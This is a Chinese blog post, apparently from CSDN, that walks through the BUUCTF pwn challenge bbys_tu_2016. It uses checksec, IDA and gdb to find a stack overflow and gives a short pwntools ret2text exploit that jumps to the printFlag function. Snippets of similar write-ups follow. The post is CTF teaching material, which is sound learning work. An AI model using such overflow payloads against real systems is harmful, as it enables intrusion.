bbys_tu_2016

最新推荐文章于 2025-07-07 10:47:51 发布
最新推荐文章于 2025-07-07 10:47:51 发布
阅读量1.1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0sway/article/details/121652301
本文详细分析了一道栈溢出的CTF题目,通过checksec发现了只开启了栈不可执行保护。在IDA中发现程序允许用户输入无限长度的数据,导致栈溢出。作者通过调试发现实际溢出距离与IDA显示不符,并给出了利用payload。最终,通过溢出跳转到printFlag函数来获取flag,但遇到了问题,需进一步调试解决。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

bbys_tu_2016

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行,看样子是栈溢出的题目。

拉进IDA中查看:
在这里插入图片描述
将用户输入的数据写入v4,但是并没有限制写入的长度,存在栈溢出。

查看下字符串,发现后门函数printFlag():
在这里插入图片描述
那就直接溢出跳过来就完事。

然而事情并没有这样就结束,打了两次发现flag出不来,就用gdb调试了下:
在这里插入图片描述
输入的位置为0xffffd714,ebp位置为0xffffd728

实际的距离是0x14并不是IDA中所显示的0xc

exp:

from pwn import *

#start
# r = process("../buu/bbys_tu_2016")
r = remote("node4.buuoj.cn",25049)

#params 
printFlag_addr = 0x804856D

#attack
payload = b'M'*(0x14+4) + p32(printFlag_addr)
r.sendline(payload)

r.interactive()
bbys_tu_2016(ret2text)
weixin_45441024的博客
11-29 1045
BUUCTF bbys_tu_2016(ret2text) 毫无疑问地check一下 运行一下,发现并没有给我们什么有用的信息,这是第一次尝试用gdb-peda来做题,附上gdb-peda的安装方式: $ git clone https://github.com/longld/peda.git ~/peda $ echo "source ~/peda/peda.py" >> ~/.gdbinit 那我们来调试一下吧 这里我在main函数的地方(ida里面找到的)下了一个断点,如果你想调
[BUUCTF-pwn]——bbys_tu_2016
Y_peak的博客
03-17 432
[BUUCTF-pwn]——bbys_tu_2016 简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节 error exploit from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0xc + 4) + p32(fla
BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2861
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
PWN 栈迁移入门解说 [Black Watch 入群题]PWN
weixin_45441024的博客
11-30 765
PWN之栈迁移解说 适用情况: 1.栈溢出的长度不足以让我们把ROP写进去 2.程序开启了栈的不可执行保护 基础知识: 我们栈迁移的目的就是将我们在栈上不可执行的链子转移到data段或者bss段上面 ,这里就需要用到leave;ret了,在这一类的题型中我们是构造并使用两次leave,来将ebp转移到我们构造的后门的起始位置。 寻找leave;ret需要用到ROPgadget这个工具 $ ROPgadget --binary '/home/pwn/Desktop/bbys_tu_2016' --only
[BUUCTF]PWN——bbys_tu_2016
mcmuyanga的博客
11-11 712
bbys_tu_2016 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况,测试时候发现输入长度过长程序会崩溃,猜测输入点存在问题 32位ida载入,检索程序里的字符串,发现有直接读出flag的函数可以利用 flag_addr=0x804856D main函数 没有限制v4的长度,存在溢出漏洞,覆盖ret为读出flag的地址即可 from pwn import * r=remote('node3.buuoj.cn',29593) flag_addr=0x
BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2
doudoudedi
01-23 1116
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...
bbys_tu_2016(write up)
m0_73756460的博客
01-14 168
【buuctf】刷题 bbys_tu_2016(write up)
BUUCTF刷题1
m0_51251108的博客
05-19 429
BUUCTF刷题wp题目:babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf:babyfengshui_33c3_2016pwnable_orw:picoctf_2018_buffer overflow 2:xdctf2015_pwn200:jarvisoj_level1:ciscn_2019_n_3:bbys_tu_2016:inndy_rop:roarctf_2019_easy_pwn:mrctf2020_
BUUOJ PWN 41-60
2h4ox1n9
12-11 404
41、jarvisoj_level3_x64 本地没问题,jaroj也没问题,buu上说啥就是不行。。libc搜不到,奇了怪了,jaroj上不用选择版本直接就可以
buuctf pwn wp(第1.5波)学会用ELF语句进行AAAA(即本地做题目)
月阴荒的博客
03-24 661
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 402
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8732
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
MySQL 安全优化指南:保护你的数据库免受攻击
最新发布
专栏
07-07 791
MySQL数据库安全优化指南 MySQL作为广泛应用的开源数据库,面临日益严峻的安全威胁。本文提供全面的安全优化方案:1)用户权限管理:遵循最小权限原则,删除默认账户,创建专用用户并精细化授权;2)网络安全:限制监听地址,配置防火墙,强制SSL加密通信;3)数据加密:实现传输加密、静态数据加密和文件系统加密;4)审计监控:开启审计日志,监控系统日志和性能指标;5)定期更新:及时安装安全补丁,保持系统和依赖库最新。通过多层面防护措施,可有效降低数据泄露风险,保障企业核心资产安全
Go应用容器化完全指南:构建最小化安全镜像的终极实践
TechEnthusiast的博客
07-03 101
镜像最小化:优先选择scratch,次选alpine安全第一:非root用户 + 只读文件系统分层优化:合理利用Docker缓存层健康检查:实现应用级健康探针资源限制:防止单个容器耗尽资源多阶段构建:分离构建和运行环境版本标签:使用语义化版本控制镜像扫描:定期扫描漏洞(Trivy/Clair)真实案例:某金融科技公司将Go服务容器化后,镜像大小从780MB降至6.3MB,部署时间缩短87%,服务器成本降低40%。Go与容器的结合是云原生时代的完美组合。
【网络协议安全】任务13:ACL访问控制列表
不羁的博客
07-06 653
本文系统介绍了访问控制列表(ACL)的概念、原理与配置实践。ACL作为网络安全的重要组件,通过定义规则实现对数据包的过滤控制。文章详细解析了ACL的分类方式(包括数字型/命名型、IPv4/IPv6支持、基本/高级/二层/用户自定义等类型),匹配机制("命中即停止"原则)及常用匹配项(IP地址、端口号、MAC地址等)。在配置部分,通过拓扑示例演示了如何实现VLAN隔离和特定网段访问控制,包括交换机VLAN配置、路由器ACL规则设置(允许192.168.0.0/24访问服务端网段,拒绝192
通过Curtain 解决方案保障BIM模型安全共享—建筑业的防泄密实战
2403_88807515的博客
07-03 452
企业数据安全不容忽视,一次文件误删或外泄就可能造成项目延期、客户流失等严重后果。Curtain e-locker数据防泄漏系统为企业提供全方位保护:自动阻止误操作和恶意窃取,全程保护重要文件,并完整记录操作日志。这款轻量级解决方案能在不影响工作效率的前提下,有效防范内部疏忽和外部攻击,是守护企业核心数据的智能卫士。
flag{}的格式是这样的
05-27
k = 13: zzzuzkzyyvhdvdzdvldvdzvddxducydazzayf5dv9BBys;iz;vhvezd=sduzdz=sdu=d9zzzzazcz k = 14: aavvalazzwieewaewmeweaweeylevzedbabzg6ew:<CCzt<j{ifweAtevAewAte>eazaaabad k = 15: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值